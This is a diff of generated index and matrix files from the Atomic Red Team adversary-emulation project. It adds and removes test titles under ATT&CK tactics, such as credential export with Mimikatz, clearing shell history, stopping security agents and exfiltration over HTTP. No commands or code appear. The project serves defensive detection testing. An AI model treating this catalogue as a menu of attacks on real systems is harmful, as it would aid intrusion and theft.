 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #1: Enumerate all accounts (Local) [linux]
@@ -2052,6 +2081,10 @@
 - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
  - Atomic Test #1: Discover System Language by Registry Query [windows]
  - Atomic Test #2: Discover System Language with chcp [windows]
+  - Atomic Test #3: Discover System Language with locale [linux]
+  - Atomic Test #4: Discover System Language with localectl [linux]
+  - Atomic Test #5: Discover System Language by locale file [linux]
+  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - [T1012 Query Registry](../../T1012/T1012.md)
  - Atomic Test #1: Query Registry [windows]
  - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
@@ -2109,6 +2142,7 @@
  - Atomic Test #2: System Time Discovery - PowerShell [windows]
  - Atomic Test #3: System Time Discovery in macOS [macos]
  - Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
+  - Atomic Test #5: System Time with Windows time Command [windows]

 # resource-development
 - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2342,6 +2376,7 @@
  - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
  - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
  - Atomic Test #5: PureLocker Ransom Note [windows]
+  - Atomic Test #6: Data Encrypted with GPG4Win [windows]
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2415,8 +2450,7 @@
  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]

 # exfiltration
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
-  - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2451,4 +2485,5 @@
  - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
  - Atomic Test #6: MAZE FTP Upload [windows]
  - Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
+  - Atomic Test #8: Python3 http.server [linux]

@@ -92,6 +92,8 @@
  - Atomic Test #3: Set a SetGID flag on file [macos, linux]
  - Atomic Test #4: Make and modify capabilities of a binary [linux]
  - Atomic Test #5: Provide the SetUID capability to a file [linux]
+  - Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
+  - Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
  - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
@@ -117,6 +119,11 @@
  - Atomic Test #2: Disable Cb Response [linux]
  - Atomic Test #3: Disable SELinux [linux]
  - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
+  - Atomic Test #39: Clear History [linux]
+  - Atomic Test #40: Suspend History [linux]
+  - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
+  - Atomic Test #42: Clear Pagging Cache [linux]
+  - Atomic Test #43: Disable Memory Swap [linux]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -281,6 +288,9 @@
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
+  - Atomic Test #3: Append to the system shell profile [linux]
+  - Atomic Test #4: Append commands user shell profile [linux]
+  - Atomic Test #5: System shell profile scripts [linux]
 - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -333,6 +343,8 @@
  - Atomic Test #3: Set a SetGID flag on file [macos, linux]
  - Atomic Test #4: Make and modify capabilities of a binary [linux]
  - Atomic Test #5: Provide the SetUID capability to a file [linux]
+  - Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
+  - Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
 - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
@@ -348,6 +360,9 @@
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
+  - Atomic Test #3: Append to the system shell profile [linux]
+  - Atomic Test #4: Append commands user shell profile [linux]
+  - Atomic Test #5: System shell profile scripts [linux]
 - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -491,7 +506,11 @@
  - Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
  - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
  - Atomic Test #4: Examine password expiration policy - All Linux [linux]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
+  - Atomic Test #3: Discover System Language with locale [linux]
+  - Atomic Test #4: Discover System Language with localectl [linux]
+  - Atomic Test #5: Discover System Language by locale file [linux]
+  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
@@ -642,6 +661,12 @@
  - Atomic Test #3: Harvest SUID executable files [linux]
  - Atomic Test #4: LinEnum tool execution [linux]
  - Atomic Test #5: New script file in the tmp directory [linux]
+  - Atomic Test #6: What shell is running [linux]
+  - Atomic Test #7: What shells are available [linux]
+  - Atomic Test #8: Command line scripts [linux]
+  - Atomic Test #9: Obfuscated command line scripts [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -704,4 +729,5 @@
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
  - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
  - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
+  - Atomic Test #8: Python3 http.server [linux]

@@ -228,6 +228,8 @@
  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1261,6 +1263,10 @@
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
+  - Atomic Test #8: CertUtil ExportPFX [windows]
+  - Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
+  - Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
+  - Atomic Test #11: Export Certificates with Mimikatz [windows]
 - [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
  - Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
 - [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
@@ -1383,6 +1389,7 @@
  - Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
  - Atomic Test #15: WinPwn - generaldomaininfo [windows]
  - Atomic Test #16: Kerbrute - userenum [windows]
+  - Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
@@ -1541,6 +1548,7 @@
  - Atomic Test #1: System Time Discovery [windows]
  - Atomic Test #2: System Time Discovery - PowerShell [windows]
  - Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
+  - Atomic Test #5: System Time with Windows time Command [windows]

 # command-and-control
 - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
@@ -1670,6 +1678,7 @@
  - Atomic Test #3: Remove Account From Domain Admin Group [windows]
 - [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
  - Atomic Test #5: PureLocker Ransom Note [windows]
+  - Atomic Test #6: Data Encrypted with GPG4Win [windows]
 - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1731,8 +1740,7 @@
  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]

 # exfiltration
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
-  - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -25,7 +25,7 @@
 |  | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -1,8 +1,8 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over Web Service](../../T1567/T1567.md) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -1,7 +1,7 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over Web Service](../../T1567/T1567.md) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
